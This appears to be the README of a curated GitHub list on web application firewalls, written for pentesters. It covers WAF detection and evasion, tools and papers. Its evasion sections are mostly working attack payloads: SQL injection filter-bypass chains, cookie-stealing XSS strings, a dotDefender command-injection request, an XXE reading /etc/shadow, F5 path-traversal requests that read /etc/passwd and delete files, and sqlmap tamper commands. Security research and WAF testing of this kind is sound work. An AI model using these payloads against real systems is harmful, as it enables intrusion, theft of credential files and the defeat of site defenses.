images | ||
papers | ||
presentations | ||
CONTRIBUTING.md | ||
LICENSE | ||
README.md |
Awesome WAF
A curated list of awesome WAF stuff.
Foreword: This was originally my own collection on WAFs. I am making it public in the hope that it will be useful for pentesters and researchers out there. "The community just learns from each other." #SharingisCaring
A Concise Definition: A web application firewall is a form of firewall with a set of configured rules that controls input, output, and/or access from, to, or by an application or service. It operates by monitoring and potentially blocking the input, output, or system service calls that do not meet the configured policy of the firewall. (Source Wikipedia)
Feel free to contribute.
Contents:
- Awesome WAFs List
- Awesome Testing Methodology
- Awesome WAF Detection
- Awesome Evasion Techniques
- Awesome Tools
- Awesome Blogs & Writeups
- Awesome Presentations & Papers
How WAFs Work:
- Using a set of rules to distinguish between normal requests and malicious requests.
- Sometimes they use a learning mode to add rules automatically through learning about user behaviour.
Operation Modes:
- Negative Model (Blacklist based) - A blacklisting model uses pre-set signatures to block web traffic that is clearly malicious, and signatures designed to prevent attacks which exploit certain website and web application vulnerabilities. For example, if a number of IP addresses send a lot more packets than is typical for that many IP addresses being used to surf a website, a blacklisting firewall can effectively prevent DDoS attacks. Blacklisting model web application firewalls are a great choice for websites and web applications on the public internet, because those targets can get a lot of legitimate web traffic from unfamiliar client machines. Eg. Block all
<script>*</script>
inputs. - Positive Model (Whitelist based) - A whitelisting model only allows web traffic according to specifically configured criteria. For example, it can be configured to only allow HTTP GET requests from certain IP addresses. This model can be very effective for casting a wide metaphorical fishing net for blocking possible cyber-attacks, but just as fishing nets also catch a lot of matter that a fisherman can't sell, whitelisting will block a lot of legitimate traffic. Whitelisting model firewalls are probably best for web applications on an internal network that are designed to be used by only a limited group of people, such as employees.
- Mixed/Hybrid Model (Inclusive model) - A hybrid security model is one that blends both whitelisting and blacklisting. Depending on all sorts of configuration specifics, hybrid firewalls could be the best choice for both web applications on internal networks and web applications on the public internet.
Testing Methodology:
Where To Look:
- Always look out for common ports that expose that a WAF
80
,443
,8000
,8008
,8080
,8088
.Tip: You can use automate this easily by commandline using a screenshot taker like WebScreenShot.
- Some WAFs set their own cookies in requests (eg. Citrix Netscaler, Yunsuo WAF).
- Some associate themselves with separate headers (eg. Anquanbao WAF, Amazon AWS WAF).
- Some often alter headers and jumble characters to confuse attacker (eg. Citrix Netscaler, F5 Big IP).
- Some (often rare) expose themselves in the
Server
header (eg. Approach, WTS WAF). - Some WAFs expose themselves in the response content (eg. DotDefender, Armor, Sitelock).
- Other WAFs reply with unusual response codes upon malicious requests (eg. WebKnight, 360 WAF).
Detection Techniques:
- Make a normal GET request from a browser, intercept and test response headers (specifically cookies).
- Make a request from command line (eg. cURL), and test response content and headers (no user-agent included).
- If there is a login page somewhere, try some common (easily detectable) payloads like
' or 1 = 1 --
. - If there is some search box or input field somewhere, try detecting payloads like
<script>alert()</script>
. - Make GET requests with outdated protocols like
HTTP/0.9
(HTTP/0.9
does not support POST type queries). - Many a times, the WAF varies the
Server
header upon different types of interactions. - Drop Action Technique - Send a raw crafted FIN/RST packet to server and identify response.
Tip: This method could be easily achieved with tools like HPing3 or Scapy.
- Side Channel Attacks - Examine the timing behaviour of the request and response content.
WAF Detection
Wanna detect WAFs? Lets see how.
Note
: This section contains manual WAF detection techniques. You might want to switch over to next section.
360 Firewall |
|
aeSecure |
|
Airlock (Phion/Ergon) |
|
Anquanbao WAF |
|
Armor Defense |
|
Application Security Manager (F5 Networks) |
|
Approach Firewall |
|
Amazon AWS WAF |
|
Yunjiasu WAF (Baidu) |
|
Barracuda WAF |
|
Bekchy (Faydata) |
|
BitNinja Firewall |
|
Bluedon IST |
|
BIG-IP ASM (F5 Networks) |
|
BinarySec WAF |
|
BlockDos |
|
ChinaCache Firewall |
|
ACE XML Gateway (Cisco) |
|
Cloudbric |
|
Cloudflare |
|
Cloudfront (Amazon) |
|
Comodo Firewall |
|
CrawlProtect (Jean-Denis Brun) |
|
GoDaddy Firewall |
|
IBM WebSphere DataPower |
|
Deny-All Firewall |
|
Distil Firewall |
|
DoSArrest Internet Security |
|
dotDefender |
|
EdgeCast (Verizon) |
|
Expression Engine (EllisLab) |
|
FortiWeb Firewall |
|
GreyWizard Firewall |
|
HyperGuard Firewall |
|
Imperva SecureSphere |
|
Immunify360 (CloudLinux Inc.) |
|
ISAServer |
|
Janusec Application Gateway |
|
Jiasule Firewall |
|
KnownSec Firewall |
|
KONA Site Defender (Akamai) |
|
Malcare (Inactiv) |
|
ModSecurity (Trustwave) |
|
NAXSI (NBS Systems) |
|
Netcontinuum (Barracuda) |
|
NinjaFirewall (NinTechNet) |
|
NetScaler (Citrix) |
|
NewDefend Firewall |
|
NSFocus Firewall |
|
onMessage Shield (Blackbaud) |
|
Palo Alto Firewall |
|
PerimeterX Firewall |
|
Profense Firewall |
|
Radware Appwall |
|
Reblaze Firewall |
|
Request Validation Mode (ASP.NET) |
|
RSFirewall (RSJoomla) |
|
Safe3 Firewall |
|
SafeDog Firewall |
|
SecureIIS (BeyondTrust) |
|
SEnginx (Neusoft) |
|
ShieldSecurity |
|
SiteGround Firewall |
|
SiteGuard (JP Secure) |
|
SiteLock TrueShield |
|
SonicWall (Dell) |
|
Sophos UTM Firewall |
|
SquareSpace Firewall |
|
StackPath (StackPath LLC) |
|
Stingray (RiverBed/Brocade) |
|
Sucuri CloudProxy |
|
Tencent Cloud WAF |
|
TrafficShield (F5 Networks) |
|
URLMaster SecurityCheck (iFinity/DotNetNuke) |
|
URLScan (Microsoft) |
|
USP Secure Entry |
|
Varnish (OWASP) |
|
VirusDie Firewall |
|
WallArm (Nginx) |
|
WatchGuard Firewall |
|
WebKnight (Aqtronix) |
|
WP Cerber Firewall |
|
Yundun Firewall |
|
Yunsuo Firewall |
|
ZenEdge Firewall |
|
Evasion Techniques
Lets look at some methods of bypassing and evading WAFs.
Fuzzing/Bruteforcing:
Method:
Running a set of payloads against the URL/endpoint. Some nice fuzzing wordlists:
- Wordlists specifically for fuzzing - Seclists Fuzzing.
- Can be done with automated tools like BurpSuite Intruder.
Technique:
- Load up your wordlist into Burp Intruder/custom fuzzer and start the bruteforce.
- Record/log all responses from the different payloads fuzzed.
- Use random user-agents, ranging from Chrome Desktop to iPhone browser.
- If blocking noticed, increase fuzz latency (eg. 2-4 secs)
- Always use proxies, since chances are real that your IP gets blocked.
Drawback:
- This method often fails.
- Many a times your IP will be blocked (temporarily/permanently).
Regex-Reversing:
Method:
- Most efficient method of bypassing WAFs.
- Some WAFs rely upon matching the attack payloads with the signatures in their databases.
- Payload matches the reg-ex the WAF triggers alarm.
Techniques:
Keyword Filter Detection/Bypass
SQL Injection
• Step 1:
Keyword filer: and
, or
, union
Possible PHP Filter Code: preg_match('/(and|or|union)/i', $id)
- Filtered Injection:
union select user, password from users
- Bypassed Injection:
1 || (select user from users where user_id = 1) = 'admin'
• Step 2:
Keyword filer: and
, or
, union
, where
Possible PHP Filter Code: preg_match('/(and|or|union|where)/i', $id)
- Filtered Injection:
1 || (select user from users where user_id = 1) = 'admin'
- Bypassed Injection:
1 || (select user from users limit 1) = 'admin'
• Step 3:
Keyword filer: and
, or
, union
, where
, limit
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit)/i', $id)
- Filtered Injection:
1 || (select user from users limit 1) = 'admin'
- Bypassed Injection:
1 || (select user from users group by user_id having user_id = 1) = 'admin'
• Step 4:
Keyword filer: and
, or
, union
, where
, limit
, group by
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by)/i', $id)
- Filtered Injection:
1 || (select user from users group by user_id having user_id = 1) = 'admin'
- Bypassed Injection:
1 || (select substr(group_concat(user_id),1,1) user from users ) = 1
• Step 5:
Keyword filer: and
, or
, union
, where
, limit
, group by
, select
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select)/i', $id)
- Filtered Injection:
1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- Bypassed Injection:
1 || 1 = 1 into outfile 'result.txt'
- Bypassed Injection:
1 || substr(user,1,1) = 'a'
• Step 6:
Keyword filer: and
, or
, union
, where
, limit
, group by
, select
, '
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select|\')/i', $id)
- Filtered Injection:
1 || (select substr(gruop_concat(user_id),1,1) user from users) = 1
- Bypassed Injection:
1 || user_id is not null
- Bypassed Injection:
1 || substr(user,1,1) = 0x61
- Bypassed Injection:
1 || substr(user,1,1) = unhex(61)
• Step 7:
Keyword filer: and
, or
, union
, where
, limit
, group by
, select
, '
, hex
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex)/i', $id)
- Filtered Injection:
1 || substr(user,1,1) = unhex(61)
- Bypassed Injection:
1 || substr(user,1,1) = lower(conv(11,10,36))
• Step 8:
Keyword filer: and
, or
, union
, where
, limit
, group by
, select
, '
, hex
, substr
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr)/i', $id)
- Filtered Injection:
1 || substr(user,1,1) = lower(conv(11,10,36))
- Bypassed Injection:
1 || lpad(user,7,1)
• Step 9:
Keyword filer: and
, or
, union
, where
, limit
, group by
, select
, '
, hex
, substr
, white space
Possible PHP Filter Code: preg_match('/(and|or|union|where|limit|group by|select|\'|hex|substr|\s)/i', $id)
- Filtered Injection:
1 || lpad(user,7,1)
- Bypassed Injection:
1%0b||%0blpad(user,7,1)
Scenario 2: Cross Site Scripting
Step 1:
- Normal deliberate test:
<script>alert()</script>
- Checking if the firewall is blocking only lowercase:
<sCRipT>alert(1)</sCRiPt>
- Breaking firewall regex with new line (
\r\n
):
<script>
alert(1)</script>
- Bypass trial with hex notation:
%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3B%3C%2F%73%63%72%69%70%74%3E
- Bypass trials with ECMAScript6 variation:
<svg><script>alert`1`</p>
<svg><script>alert`1`
- Testing for recursive filters:
<scr<script>ipt>alert(1);</scr</script>ipt>
- Bypass trials with anchor tags without whitespaces:
<a/href=”j	a	v	asc	ri	pt:alert(1)”>
- Bypass trial with HTML encoded notation:
<script>alert(1);</script>
- Bypass trial with unicode encoding:
script/src="data:text%2Fj\u0061v\u0061script,\u0061lert(1)"></script a=\u0061 & /=%2F
- Bypass trial via overflow technique:
<iframe src=j
	a
		v
			a
				s
					c
						r
							i
		 						p
									t
										:a
											l
					 							e
													r
														t
										 					%28
																1
																	%29></iframe>
Browser Bugs:
Charset Bugs:
- We can try changing charset header to higher Unicode (eg. UTF-32) and test payloads.
- When the site decodes the string, the payload gets triggered.
Example request:
GET /page.php?param=∀㸀㰀script㸀alert(1)㰀/script㸀 HTTP/1.1 Host: site.com User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0 Accept-Charset:utf-32, iso-8859-1;q=0.5 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate
When the site loads, it will be encoded to the UTF-32 encoding that we set, and
then as the output encoding of the page is utf-8, it will be rendered as: "<script>alert (1) </ script>
.
Final URL encoded payload: %E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
Null Bytes:
- The null bytes are commonly used as string terminator.
- This can help us evade many web application filters in case they are not filtering out the null bytes.
Payload examples:
<scri%00pt>alert(1);</scri%00pt>
<scri\x00pt>alert(1);</scri%00pt>
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
Parsing Bugs:
- RFC states that NodeNames cannot begin with whitespace.
- But we can use special chars like
%
,//
,!
,?
, etc.
Examples:
<// style=x:expression\28write(1)\29>
- Works upto IE7 (Source)<!--[if]><script>alert(1)</script -->
- Works upto IE9 (Reference)<?xml-stylesheet type="text/css"?><root style="x:expression(write(1))"/>
- Works in IE7 (Reference)<%div%20style=xss:expression(prompt(1))>
- Works Upto IE7
Unicode Separators:
- Every browser has their own specific charset of separators.
- We can fuzz charset range of
0x00
to0xFF
and get the set of separators for each browser.
Here is a compiled list of separators:
- IExplorer:
0x09
,0x0B
,0x0C
,0x20
,0x3B
- Chrome:
0x09
,0x20
,0x28
,0x2C
,0x3B
- Safari:
0x2C
,0x3B
- FireFox:
0x09
,0x20
,0x28
,0x2C
,0x3B
- Opera:
0x09
,0x20
,0x2C
,0x3B
- Android:
0x09
,0x20
,0x28
,0x2C
,0x3B
An exotic payload:
<a/onmouseover[\x0b]=location='\x6A\x61\x76\x61\x73\x63\x72\x69\x70\x74\x3A\x61\x6C\x65\x72\x74\x28\x30\x29\x3B'>pwn3d
Google Dorks Approach:
Method:
- There are a lot of known bypasses of various web application firewalls (see section).
- With the help of google dorks, we can easily find bypasses.
Techniques:
Before anything else, you should hone up skills from Google Dorks Cheat Sheet.
-
Normal search:
+<wafname> waf bypass
-
Searching for specific version exploits:
"<wafname> <version>" (bypass|exploit)
-
For specific type bypass exploits:
"<wafname>" +<bypass type> (bypass|exploit)
-
On Exploit DB:
site:exploit-db.com +<wafname> bypass
-
On 0Day Inject0r DB:
site:0day.today +<wafname> <type> (bypass|exploit)
-
On Twitter:
site:twitter.com +<wafname> bypass
-
On Pastebin
site:pastebin.com +<wafname> bypass
Known Bypasses:
Cloudflare
- XSS Bypass by @ArbazKiraak
<a href="j	a	v	asc
ri	pt:\u0061\u006C\u0065\u0072\u0074(this['document']['cookie'])">X</a>`
Barracuda
- Cross Site Scripting by @WAFNinja
<body style="height:1000px" onwheel="alert(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
<b/%25%32%35%25%33%36%25%36%36%25%32%35%25%33%36%25%36%35mouseover=alert(1)>
- HTML Injection by @Global-Evolution
GET /cgi-mod/index.cgi?&primary_tab=ADVANCED&secondary_tab=test_backup_server&content_only=1&&&backup_port=21&&backup_username=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_type=ftp&&backup_life=5&&backup_server=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_path=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net/etc/bad-example.exe%3E&&backup_password=%3E%22%3Ciframe%20src%3Dhttp%3A//www.example.net%20width%3D800%20height%3D800%3E&&user=guest&&password=121c34d4e85dfe6758f31ce2d7b763e7&&et=1261217792&&locale=en_US
Host: favoritewaf.com
User-Agent: Mozilla/5.0 (compatible; MSIE5.01; Windows NT)
- Barracuda WAF 8.0.1 - Remote Command Execution (Metasploit) by @xort
- Barracuda Spam & Virus Firewall 5.1.3 - Remote Command Execution (Metasploit) by @xort
Imperva SecureSphere
- Imperva SecureSphere 13 - Remote Command Execution by @rsp3ar
- XSS Bypass by @WAFNinja
%3Cimg%2Fsrc%3D%22x%22%2Fonerror%3D%22prom%5Cu0070t%2526%2523x28%3B%2526%2523x27%3B%2526%2523x58%3B%2526%2523x53%3B%2526%2523x53%3B%2526%2523x27%3B%2526%2523x29%3B%22%3E
- XSS Bypass by @i_bo0om
<iframe/onload='this["src"]="javas	cript:al"+"ert``"';>
<img/src=q onerror='new Function`al\ert\`1\``'>
- SQLi Bypass by @DRK1WI
15 and '1'=(SELECT '1' FROM dual) and '0having'='0having'
- SQLi by @Giuseppe D'Amore
stringindatasetchoosen%%' and 1 = any (select 1 from SECURE.CONF_SECURE_MEMBERS where FULL_NAME like '%%dministrator' and rownum<=1 and PASSWORD like '0%') and '1%%'='1
DotDefender
- Firewall disable by (v5.0) by @hyp3rlinx
PGVuYWJsZWQ+ZmFsc2U8L2VuYWJsZWQ+
<enabled>false</enabled>
- Remote Command Execution (v3.8-5) by @John Dos
POST /dotDefender/index.cgi HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Authorization: Basic YWRtaW46
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
sitename=dotdefeater&deletesitename=dotdefeater;id;ls -al
../;pwd;&action=deletesite&linenum=15
- Persistent XSS (v4.0) by @EnableSecurity
GET /c?a=<script> HTTP/1.1
Host: 172.16.159.132
User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US;
rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
<script>alert(1)</script>: aa
Keep-Alive: 300
- R-XSS Bypass by @WAFNinja
<svg/onload=prompt(1);>
<isindex action="javas&tab;cript:alert(1)" type=image>
<marquee/onstart=confirm(2)>
- GET - XSS Bypass (v4.02) by @DavidK
/search?q=%3Cimg%20src=%22WTF%22%20onError=alert(/0wn3d/.source)%20/%3E
<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v%2Ba%2Be%2Bs](e%2Bs%2Bv%2B
h%2Bn)(/0wn3d/.source)" />
- POST - XSS Bypass (v4.02) by @DavidK
<img src="WTF" onError="{var
{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/0wn3d/
.source)" />
clave
XSS (v4.02) by @DavidK
/?&idPais=3&clave=%3Cimg%20src=%22WTF%22%20onError=%22{
Fortinet Fortiweb
pcre_expression
unvaidated XSS by @Benjamin Mejri
/waf/pcre_expression/validate?redir=/success&mkey=0%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C
/waf/pcre_expression/validate?redir=/success%20%22%3E%3Ciframe%20src=http://vuln-lab.com%20onload=alert%28%22VL%22%29%20%3C&mkey=0
- CSP Bypass by @Binar10
POST Type Query
POST /<path>/login-app.aspx HTTP/1.1
Host: <host>
User-Agent: <any valid user agent string>
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: <the content length must be at least 2399 bytes>
var1=datavar1&var2=datavar12&pad=<random data to complete at least 2399 bytes>
GET Type Query
http://<domain>/path?var1=vardata1&var2=vardata2&pad=<large arbitrary data>
F5 ASM
- XSS Bypass by @WAFNinja
<table background="javascript:alert(1)"></table>
"/><marquee onfinish=confirm(123)>a</marquee>
F5 BIG-IP
- XSS Bypass by @WAFNinja
<body style="height:1000px" onwheel="[DATA]">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="[DATA]">
<body style="height:1000px" onwheel="prom%25%32%33%25%32%36x70;t(1)">
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="prom%25%32%33%25%32%36x70;t(1)">
- POST Based XXE by @Anonymous
<?xml version="1.0" encoding='utf-8' ?>
<!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]>
<message><dialogueType>&e;</dialogueType></message>
- F5 BIG-IP Directory Traversal by @Anastasios Monachos
Read Arbitrary File
/tmui/Control/jspmap/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd
Delete Arbitrary File
POST /tmui/Control/form HTTP/1.1
Host: site.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:32.0) Gecko/20100101 Firefox/32.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: JSESSIONID=6C6BADBEFB32C36CDE7A59C416659494; f5advanceddisplay=""; BIGIPAuthCookie=89C1E3BDA86BDF9E0D64AB60417979CA1D9BE1D4; BIGIPAuthUsernameCookie=admin; F5_CURRENT_PARTITION=Common; f5formpage="/tmui/system/archive/properties.jsp?&name=../../../../../etc/passwd"; f5currenttab="main"; f5mainmenuopenlist=""; f5_refreshpage=/tmui/Control/jspmap/tmui/system/archive/properties.jsp%3Fname%3D../../../../../etc/passwd
Content-Type: application/x-www-form-urlencoded
_form_holder_opener_=&handler=%2Ftmui%2Fsystem%2Farchive%2Fproperties&handler_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&showObjList=&showObjList_before=&hideObjList=&hideObjList_before=&enableObjList=&enableObjList_before=&disableObjList=&disableObjList_before=&_bufvalue=icHjvahr354NZKtgQXl5yh2b&_bufvalue_before=icHjvahr354NZKtgQXl5yh2b&_bufvalue_validation=NO_VALIDATION&com.f5.util.LinkedAdd.action_override=%2Ftmui%2Fsystem%2Farchive%2Fproperties&com.f5.util.LinkedAdd.action_override_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties&linked_add_id=&linked_add_id_before=&name=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&name_before=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&form_page=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&form_page_before=%2Ftmui%2Fsystem%2Farchive%2Fproperties.jsp%3F&download_before=Download%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&restore_before=Restore&delete=Delete&delete_before=Delete
- F5 BIG-IP 11.6 SSL Virtual Server - 'Ticketbleed' Memory Disclosure by @0x00String.
- F5 BIG-IP Remote Root Authentication Bypass Vulnerability by @Rel1k.
F5 FirePass
- SQLi Bypass from @Anonymous
state=%2527+and+
(case+when+SUBSTRING(LOAD_FILE(%2527/etc/passwd%2527),1,1)=char(114)+then+
BENCHMARK(40000000,ENCODE(%2527hello%2527,%2527batman%2527))+else+0+end)=0+--+
Citrix NetScaler NS10.5
- HTTP Parameter Pollution @BGA Security
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:tem="http://tempuri.org/">
<soapenv:Header/>
<soapenv:Body>
<string>’ union select current_user, 2#</string>
</soapenv:Body>
</soapenv:Envelope>
generic_api_call.pl
XSS by @NNPoster
/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e
WebKnight
- Cross Site Scripting (Source)
<isindex action=j	a	vas	c	r	ipt:alert(1) type=image>
<marquee/onstart=confirm(2)>
<details ontoggle=alert(1)>
<div contextmenu="xss">Right-Click Here<menu id="xss" onshow="alert(1)">
QuickDefense
- Cross Site Scripting (Source)
?<input type="search" onsearch="aler\u0074(1)">
<details ontoggle=alert(1)>
Apache
- Writing method type in lowercase. (Source)
get /login HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
IIS
- Tabs before method (Source)
GET /login.php HTTP/1.1
Host: favoritewaf.com
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Awesome Tools
WAF Fingerprinting:
1. Fingerprinting with NMap:
Source: GitHub | SVN
-
Normal WAF Fingerprinting
nmap --script=http-waf-fingerprint <target>
-
Intensive WAF Fingerprinting
nmap --script=http-waf-fingerprint --script-args http-waf-fingerprint.intensive=1 <target>
-
Generic Detection
nmap --script=http-waf-detect <target>
2. Fingerprinting with WafW00f:
Source: GitHub | Pypi
wafw00f <target>
WAF Testing:
- WAFBench - A WAF performance testing suite by Microsoft.
- WAF Testing Framework - A free WAF testing tool by Imperva.
WAF Evading:
1. Evading WAFs with SQLMap Tamper Scripts:
- General Tamper Testing
sqlmap -u <target> --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,base64encode,between,chardoubleencode,charencode,charunicodeencode,equaltolike,greatest,ifnull2ifisnull,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2plus,space2randomblank,unionalltounion,unmagicquotes
- MSSQL Tamper Testing
sqlmap -u <target> --level=5 --risk=3 -p 'item1' --tamper=between,charencode,charunicodeencode,equaltolike,greatest,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,sp_password,space2comment,space2dash,space2mssqlblank,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes
- MySQL Tamper Testing
sqlmap -u <target> --level=5 --risk=3 -p 'item1' --tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,securesphere,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor
- Generic Tamper Testing
sqlmap -u <target> --level=5 --risk=3 -p 'item1' --tamper=apostrophemask,apostrophenullencode,appendnullbyte,base64encode,between,bluecoat,chardoubleencode,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,nonrecursivereplacement,percentage,randomcase,randomcomments,securesphere,space2comment,space2dash,space2hash,space2morehash,space2mssqlblank,space2mssqlhash,space2mysqlblank,space2mysqldash,space2plus,space2randomblank,sp_password,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords
2. Evading WAFs with WAFNinja
Source: GitHub
-
Fuzzing
python wafninja.py fuzz -u <target> -t xss
-
Bypassing
python wafninja.py bypass -u <target> -p "name=<payload>&Submit=Submit" -t xss
-
Insert Fuzzing
python wafninja.py insert-fuzz -i select -e select -t sql
3. Evading WAFs with WhatWaf:
Source: GitHub
whatwaf -u <target> --ra --throttle 2
4. Evading with Bypass WAF - BurpSuite:
Source: Burp Suite App Store
- Bypass WAF adds some headers to evade some WAF products:
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
- Create a session handling rule in Burp that invokes this extension.
- Modify the scope to include applicable tools and URLs.
- Configure the bypass options on the "Bypass WAF" tab.
Blogs and Writeups
- Web Application Firewall (WAF) Evasion Techniques #1 - By @Secjuice
- Web Application Firewall (WAF) Evasion Techniques #2 - By @Secjuice
- Web Application Firewall (WAF) Evasion Techniques #3 - By @Secjuice
- SQL Injection Bypassing WAF - By @OWASP
- How To Reverse Engineer A Web Application Firewall Using Regular Expression Reversing - By @SunnyHoi
- Bypassing Web-Application Firewalls by abusing SSL/TLS - By @0x09AL
Presentations & Research Papers
Research Papers:
- Protocol Level WAF Evasion - A protocol level WAF evasion techniques and analysis by Qualys.
- Neural Network based WAF for SQLi - A paper about building a neural network based WAF for detecting SQLi attacks.
- Bypassing Web Application Firewalls with HTTP Parameter Pollution - A ressearch paper from Exploit DB about effectively bypassing WAFs via HTTP Parameter Pollution.
- Poking A Hole in the Firewall - A paper by Rafay Baloch about modern firewall analysis and related bypasses.
- Modern WAF Fingerprinting and XSS Filter Bypass - A paper by Rafay Baloch about WAF fingerprinting and bypassing XSS filters.
- WAF Evasion Testing - A WAF evasion testing guide from SANS.
- WASC WAF Evaluation Criteria - A guide for WAF Evaluation from Web Application Security Consortium
- WAF Evaluation and Analysis - A paper about WAF evaluation and analysis of 2 most used WAFs (ModSecurity & WebKnight) from University of Amsterdam.
- Bypassing all WAF XSS Filters - A paper about bypassing all XSS filter rules and evading WAFs for XSS.
- Beyond SQLi - Obfuscate and Bypass WAFs - A research paper from Exploit Database about obfuscating SQL injection queries to effectively bypass WAFs.
Presentations:
- WAF Profiling & Evasion Techniques - A WAF testing and evasion guide from OWASP.
- Protocol Level WAF Evasion Techniques - A presentation at about efficiently evading WAFs at protocol level from BlackHat US 12.
- Analysing Attacking Detection Logic Mechanisms - A presentation about WAF logic applied to detecting attacks from BlackHat US 16.
- WAF Bypasses and PHP Exploits - A presentation about evading WAFs and developing related PHP exploits.
- Playing Around with WAFs - A small presentation about WAF profiling and playing around with them from Defcon 16.